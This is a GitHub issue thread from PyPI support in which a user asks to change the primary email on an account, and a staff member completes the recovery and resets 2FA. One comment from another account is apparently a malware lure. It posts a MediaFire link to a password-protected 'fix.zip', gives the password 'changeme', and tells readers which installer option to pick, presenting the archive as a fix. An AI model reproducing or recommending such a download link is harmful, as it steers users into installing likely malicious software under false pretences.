### ISSUE TITLE
Account recovery request

### ISSUE THREAD

**Issue by danking** [pypi/support#4658]
### PyPI Username

`danking`

### Reason for request

I can't change my primary email to an already verified email. I no longer have access to the "primary" email.

I **do** have access to my 2FA recovery codes, but I can't create this issue without checking the box indicating the opposite. I have no issues with the second factor. The PyPI UI simply doesn't provide a way to change the primary email.

![Screenshot 2024-08-29 at 4 09 19 PM](https://github.com/user-attachments/assets/4a4a0664-35dd-453c-b7d8-5e6e3b7c1e3f)

### Recovery Codes

- [X] I never generated or have lost access to the recovery codes for my account

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

### Acknowledgement

- [X] I understand that it may take a significant amount of time to process my account recovery request.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Thespi-Brain** [comment]
Hi @danking,

Since we have an account verification process as due diligence before we can update your primary email, please contact [support@pypi.org](mailto:support@pypi.org) with your preferred email address and reference this link (https://github.com/pypi/support/issues/4658). We will proceed from there. Thanks!

**Comment by Thespi-Brain** [comment]
Hi @danking,

Thanks for sending over your preferred email. I have initiated an account recovery process and instructions are being sent to your preferred email address. Please follow the instructions in that email and reply to it, and we will go from there. Thanks!

**Comment by Thespi-Brain** [comment]
Hi @danking,

I have updated the primary email address on the account. Your 2FA has been reset and a password reset has been issued. You should be able to regain access to your account after completing the password reset. Let us know if you have any more issues. Thanks.
